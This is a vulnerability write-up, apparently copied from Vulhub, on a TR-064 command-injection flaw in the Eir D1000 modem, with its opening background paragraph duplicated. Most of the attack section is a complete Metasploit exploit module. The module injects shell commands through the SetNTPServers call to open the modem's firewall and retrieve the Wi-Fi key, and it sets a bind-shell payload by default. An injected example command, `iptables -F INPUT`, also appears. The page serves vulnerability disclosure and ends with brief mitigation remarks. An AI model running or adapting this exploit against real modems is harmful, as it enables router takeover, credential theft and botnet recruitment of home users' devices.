VULHUB ™

### Background The Eir D1000 Modem has bugs that allow an attacker to gain full control of the modem from the Internet. The modem could then be used to hack into internal computers on the network, as a proxy host to hack other computers or even as a bot in a botnet. A port scan of the the modem revealed that it has one TCP port exposed to the Internet, port 7547. Port 7547 is running as part of the TR-069 protocol. TR-069 a.k.a CPE WAN Management Protocol a.k.a. CWMP is a protocol that ISPs like Eir use to manage all of the modems on their network. When Eir’s technical support want to manage the modem – maybe to reset the Wi-Fi password, they instruct the ACS (Access Control Server – the server used to manage the modems) to connect to the modem on port 7547 and send it a “connection request” command. The modem then connects to the ACS and Eir’s technical support can change whatever settings they want. What is not very well known is that the server on port 7457 is also a TR-064...

### Background The Eir D1000 Modem has bugs that allow an attacker to gain full control of the modem from the Internet. The modem could then be used to hack into internal computers on the network, as a proxy host to hack other computers or even as a bot in a botnet. A port scan of the the modem revealed that it has one TCP port exposed to the Internet, port 7547. Port 7547 is running as part of the TR-069 protocol. TR-069 a.k.a CPE WAN Management Protocol a.k.a. CWMP is a protocol that ISPs like Eir use to manage all of the modems on their network. When Eir’s technical support want to manage the modem – maybe to reset the Wi-Fi password, they instruct the ACS (Access Control Server – the server used to manage the modems) to connect to the modem on port 7547 and send it a “connection request” command. The modem then connects to the ACS and Eir’s technical support can change whatever settings they want. What is not very well known is that the server on port 7457 is also a TR-064 server. This is another protocol related to TR-069. It is also known as “LAN-Side CPE Configuration”. The idea behind this protocol is to allow the ISP to configure the modem from installation software supplied with the modem. The protocol is not supposed to be accessed from the WAN side of the modem but in the D1000 modem, we can send TR-064 commands to port 7547 on the WAN side. This allows us to “configure” the modem from the Internet. There are many TR-064 commands, some useful ones are: ``` DeviceInfo/GetInfo: This gives general information about the modem including serial number, firmware version, device description etc... WLANConfiguration/GetSecurityKeys: This returns the Wi-Fi key WLANConfiguration/GetInfo: This returns the SSID and MAC address Time/SetNTPServers: This is the pièce de résistance. We can exploit this command to run busybox shell commands on the modem. e.g. setting the NTP server to "`iptables -F INPUT`" turns off the firewall on the modem which in turn allows access to the administration interface on port 80. ``` ### Proof Of Concept Exploit By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall. This allows access the the web administration interface from the Internet facing side of the modem. The default login password for the D1000 is the Wi-Fi password. This is easily obtained with another TR-064 command. Here’s a Metasploit module : ``` ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Eir D1000 Modem CWMP Exploit POC', 'Description' => %q{ This exploit drops the firewall to allow access to the web administration interface on port 80 and it also retrieves the wifi password. The default login password to the web interface is the default wifi password. This exploit was tested on firmware versions up to 2.00(AADU.5)_20150909. }, 'Author' => [ 'Kenzo', # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'DisclosureDate' => 'Nov 07 2016', 'Privileged' => true, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/shell_bind_tcp' }, 'Targets' => [ [ 'MIPS Little Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE } ], ], 'DefaultTarget' => 1 )) register_options( [ Opt::RPORT(7547), # CWMP port ], self.class) @data_cmd_template = "<?xml version=\"1.0\"?>" @data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" @data_cmd_template << " <SOAP-ENV:Body>" @data_cmd_template << " <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">" @data_cmd_template << " <NewNTPServer1>%s</NewNTPServer1>" @data_cmd_template << " <NewNTPServer2></NewNTPServer2>" @data_cmd_template << " <NewNTPServer3></NewNTPServer3>" @data_cmd_template << " <NewNTPServer4></NewNTPServer4>" @data_cmd_template << " <NewNTPServer5></NewNTPServer5>" @data_cmd_template << " </u:SetNTPServers>" @data_cmd_template << " </SOAP-ENV:Body>" @data_cmd_template << "</SOAP-ENV:Envelope>" end def check begin res = send_request_cgi({ 'uri' => '/globe' }) rescue ::Rex::ConnectionError vprint_error("A connection error has occured") return Exploit::CheckCode::Unknown end if res and res.code == 404 and res.body =~ /home_wan.htm/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit print_status("Trying to access the device...") unless check == Exploit::CheckCode::Appears fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("Exploiting...") print_status("Dropping firewall on port 80...") execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","") key = get_wifi_key() print_status("WiFi key is #{key}") execute_command("tick.eircom.net","") end def execute_command(cmd, opts) uri = '/UD/act?1' soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers" data_cmd = @data_cmd_template % "#{cmd}" begin res = send_request_cgi({ 'uri' => uri, 'ctype' => "text/xml", 'method' => 'POST', 'headers' => { 'SOAPAction' => soapaction, }, 'data' => data_cmd }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def get_wifi_key() print_status("Getting the wifi key...") uri = '/UD/act?1' soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" data_cmd_template = "<?xml version=\"1.0\"?>" data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" data_cmd_template << " <SOAP-ENV:Body>" data_cmd_template << " <u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">" data_cmd_template << " </u:GetSecurityKeys>" data_cmd_template << " </SOAP-ENV:Body>" data_cmd_template << "</SOAP-ENV:Envelope>" data_cmd= data_cmd_template begin res = send_request_cgi({ 'uri' => uri, 'ctype' => "text/xml", 'method' => 'POST', 'headers' => { 'SOAPAction' => soapaction, }, 'data' => data_cmd }) /NewPreSharedKey>(?<key>.*)<\/NewPreSharedKey/ =~ res.body return key rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end ``` ### Precautions Eir Could Have Taken To Make The Modem More Secure 1. Back in the days when Eir were Eircom and they used Netopia modems, port 7547 was blocked to every IP address except those assigned to Eir’s management servers. This meant even though the Netopia modems had bugs, they could not be exploited. Inexplicably, Eir do not do this for their newer modems. If they did, these bugs would not have been exploitable. 2. They could have started a bug bounty program. This would have created an incentive for security researchers to look for flaws in Eir’s modems. ### Other Points Of Interest * This is not the only bug in this software, there are others. It was not even the first, previous firmware versions were also vulnerable to CVE-2014-9222, the “Misfortune Cookie” bug. Eir quietly patched that bug in firmware version “2.00(AADU.5)D0.”, sometime in early 2015. * There are also a few thousand Eir modems being used on other ISP networks (mainly Vodafone). These are no longer being managed by Eir therefore any firmware updates will not be applied to these and it is likely that they will remain vulnerable to this exploit even if Eir update the firmware to fix these bugs. * Another of Eir’s modems, the “P-660HN-T1A_IPv6” is vulnerable to the same bugs. * Currently Shodan.io, the “Internet of Things” search engine shows that they are about 66,000 modems affected by this bug. Previously, it showed it to be around 100,000. Click here to search Shodan.io (you need to have an account there)